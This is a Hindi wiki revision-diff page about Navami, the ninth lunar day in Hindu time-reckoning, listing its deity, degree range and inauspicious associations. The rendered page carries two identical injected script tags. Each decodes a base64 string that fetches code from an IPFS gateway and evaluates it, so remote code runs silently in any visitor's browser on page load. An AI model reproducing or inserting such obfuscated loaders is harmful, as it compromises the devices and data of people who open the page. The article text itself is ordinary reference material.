Difference between revisions of "नवमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*सूर्य से चन्द्र के अन्तर त...' के साथ नया पन्ना बनाया)
 
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
*[[सूर्य ग्रह|सूर्य]] से [[चंद्र ग्रह|चन्द्र]] के अन्तर तक 97° से 108° तक नवमी होती है, तब [[शुक्ल पक्ष]] की नवमी और 277° से 288° तक कृष्ण नवमी रहती है।  
 
*[[सूर्य ग्रह|सूर्य]] से [[चंद्र ग्रह|चन्द्र]] के अन्तर तक 97° से 108° तक नवमी होती है, तब [[शुक्ल पक्ष]] की नवमी और 277° से 288° तक कृष्ण नवमी रहती है।  
 
*नवमी चन्द्र तिथि की स्वामिनी ‘[[दुर्गा|दुर्गा देवी]]’ है। यह ‘रिक्ता’ संज्ञक है। इसका विशेष नाम ‘उग्रा’ है। इसमें समस्त शुभ कार्य वर्जित है।  
 
*नवमी चन्द्र तिथि की स्वामिनी ‘[[दुर्गा|दुर्गा देवी]]’ है। यह ‘रिक्ता’ संज्ञक है। इसका विशेष नाम ‘उग्रा’ है। इसमें समस्त शुभ कार्य वर्जित है।  
*नवमी शनिवार को सिद्धिदा और गुरूवार को मृत्युदा होती है।  
+
*नवमी शनिवार को सिद्धिदा और गुरुवार को मृत्युदा होती है।  
 
*[[चैत्र]] मास में यह शून्य संज्ञक होती है।  
 
*[[चैत्र]] मास में यह शून्य संज्ञक होती है।  
 
*नवमी तिथि की दिशा पूर्व है।
 
*नवमी तिथि की दिशा पूर्व है।
Line 8: Line 8:
 
*विशेष – नवमी तिथि [[शुक्र ग्रह]] की जन्म तिथि है। इसलिये शुभ कार्यों में वर्जित करनी चाहिये।
 
*विशेष – नवमी तिथि [[शुक्र ग्रह]] की जन्म तिथि है। इसलिये शुभ कार्यों में वर्जित करनी चाहिये।
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=  
+
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
Line 16: Line 17:
 
}}
 
}}
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 22: Line 24:
 
*[http://www.dharm.co.cc/2010/02/blog-post_10.html  हिन्दू काल गणना]
 
*[http://www.dharm.co.cc/2010/02/blog-post_10.html  हिन्दू काल गणना]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{काल गणना}}
+
{{तिथि}}
[[Category:नया पन्ना]]
 
[[Category:पर्यावरण और जलवायु]]
 
[[Category:ॠतु और मौसम]]
 
[[Category:काल_गणना]]
 
 
[[Category:कैलंडर]]
 
[[Category:कैलंडर]]
 +
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]]
 +
[[Category:संस्कृति कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:15, 21 March 2014

  • soory se chandr ke antar tak 97° se 108° tak navami hoti hai, tab shukl paksh ki navami aur 277° se 288° tak krishna navami rahati hai.
  • navami chandr tithi ki svamini ‘durga devi’ hai. yah ‘rikta’ sanjnak hai. isaka vishesh nam ‘ugra’ hai. isamean samast shubh kary varjit hai.
  • navami shanivar ko siddhida aur guruvar ko mrityuda hoti hai.
  • chaitr mas mean yah shoony sanjnak hoti hai.
  • navami tithi ki disha poorv hai.
  • shivapoojan ke liye yah tithi shukl paksh mean ashubh aur krishna paksh mean shubh hoti hai.
  • chandrama ki is nauvian kala ke amrit ka pan yamaraj karate haian.
  • vishesh – navami tithi shukr grah ki janm tithi hai. isaliye shubh karyoan mean varjit karani chahiye.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh